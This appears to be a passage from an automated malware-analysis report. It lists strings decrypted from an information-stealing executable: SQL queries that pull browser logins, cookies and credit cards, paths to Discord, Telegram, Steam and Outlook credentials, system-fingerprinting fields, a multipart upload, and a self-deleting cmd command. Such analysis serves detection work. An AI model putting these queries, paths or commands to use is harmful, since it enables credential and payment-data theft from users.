                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_column_blob
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: encrypted_key
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PATH
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: NSS_Init
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: NSS_Shutdown
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PK11_GetInternalKeySlot
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PK11_FreeSlot
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PK11_Authenticate
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PK11SDR_Decrypt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: C:\ProgramData\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: browser:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: profile:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: url:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: login:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: password:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Opera
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: OperaGX
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Network
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: cookies
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: .txt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: TRUE
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: FALSE
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: autofill
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: history
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: cc
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: name:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: month:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: year:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: card:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Cookies
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Login Data
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Web Data
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: History
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: logins.json
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: formSubmitURL
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: usernameField
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: encryptedUsername
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: encryptedPassword
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: guid
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: cookies.sqlite
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: formhistory.sqlite
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: places.sqlite
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: plugins
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Local Extension Settings
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Sync Extension Settings
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: IndexedDB
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Opera Stable
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Opera GX Stable
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CURRENT
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: chrome-extension_
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: _0.indexeddb.leveldb
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Local State
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: profiles.ini
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: chrome
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: opera
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: firefox
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: wallets
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %08lX%04lX%lu
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ProductName
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: x32
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: x64
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DisplayName
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DisplayVersion
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Network Info:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - IP: IP?
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Country: ISO?
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: System Summary:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - HWID:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - OS:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Architecture:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - UserName:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Computer Name:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Local Time:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - UTC:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Language:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Keyboards:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Laptop:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Running Path:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - CPU:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Threads:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Cores:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - RAM:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Display Resolution:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - GPU:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: User Agents:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Installed Apps:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: All Users:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Current User:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Process List:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: system_info.txt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: freebl3.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: mozglue.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: msvcp140.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: nss3.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: softokn3.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: vcruntime140.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Temp\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: .exe
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: runas
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: open
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: /c start
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %DESKTOP%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %APPDATA%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %LOCALAPPDATA%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %USERPROFILE%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %DOCUMENTS%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %PROGRAMFILES_86%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %RECENT%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: *.lnk
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: files
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \discord\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Local Storage\leveldb
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Telegram Desktop\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: key_datas
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: D877F783D5D3EF8C*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: map*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: A7FDF864FBC10B77*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: A92DAA6EA6F891F2*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: F8806DD0C461824F*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Telegram
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Tox
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: *.tox
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: *.ini
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Password
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 00000001
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 00000002
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 00000003
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 00000004
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Outlook\accounts.txt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Pidgin
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \.purple\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: accounts.xml
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: dQw4w9WgXcQ
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: token:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Valve\Steam
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SteamPath
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \config\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ssfn*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: config.vdf
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DialogConfig.vdf
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: libraryfolders.vdf
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: loginusers.vdf
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Steam\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: done
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: soft
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Discord\tokens.txt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: https
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: POST
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: HTTP/1.1
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: hwid
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: build
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: token
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: file_name
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: file
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: message
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: screenshot.jpg
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,3_2_6C4BA9A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B4440 PK11_PrivDecrypt,3_2_6C4B4440
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C484420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,3_2_6C484420
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B44C0 PK11_PubEncrypt,3_2_6C4B44C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,3_2_6C5025B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4BA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,3_2_6C4BA650
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C498670 PK11_ExportEncryptedPrivKeyInfo,3_2_6C498670
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C49E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,3_2_6C49E6E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,3_2_6C4DA730
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4E0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,3_2_6C4E0180
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B43B0 PK11_PubEncryptPKCS1,PR_SetError,3_2_6C4B43B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,3_2_6C4D7C00
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C497D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,3_2_6C497D60
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,3_2_6C4DBD30
